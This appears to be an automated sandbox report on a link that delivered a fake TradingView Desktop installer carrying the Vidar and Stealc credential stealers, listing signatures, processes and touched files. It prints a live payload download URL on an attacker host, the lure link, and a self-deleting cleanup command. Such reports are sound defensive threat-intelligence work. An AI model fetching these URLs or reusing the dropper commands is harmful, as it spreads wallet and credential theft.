Analysis Overview
Threat Level: Known bad
The file https://cutt.ly/8esAXbUV was found to be: Known bad.
Malicious Activity Summary
Detect Vidar Stealer
Stealc
Vidar
Downloads MZ/PE file
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies registry class
Delays execution with timeout.exe
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-28 18:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-28 18:42
Reported
2024-06-28 18:44
Platform
win10v2004-20240611-en
Max time kernel
128s
Max time network
127s
Command Line
Signatures
Detect Vidar Stealer
Stealc
Vidar
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\KFIIJJ.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cutt.ly/8esAXbUV
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8e90446f8,0x7ff8e9044708,0x7ff8e9044718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5784 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6624 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe
"C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe"
C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe
"C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe"
C:\ProgramData\KFIIJJ.exe
C:\ProgramData\\KFIIJJ.exe http://mamallan.life/new_clip.exe
C:\ProgramData\KFIIJJ.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAECGCGHCGHC" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe
"C:\Users\Admin\Documents\TradingView_Desktop_(password_github)\TradingView Desktop.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,12702847142868035514,15722579942033461234,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1916 /prefetch:2
Network
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
\??\pipe\LOCAL\crashpad_2320_ZOKBAEKWECVVNCXR
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
C:\ProgramData\KFIIJJ.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8Z1Z4637\new_clip[1].exe
C:\ProgramData\DAECGCGHCGHC\EGIDBF
C:\ProgramData\DAECGCGHCGHC\KJEHCG
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE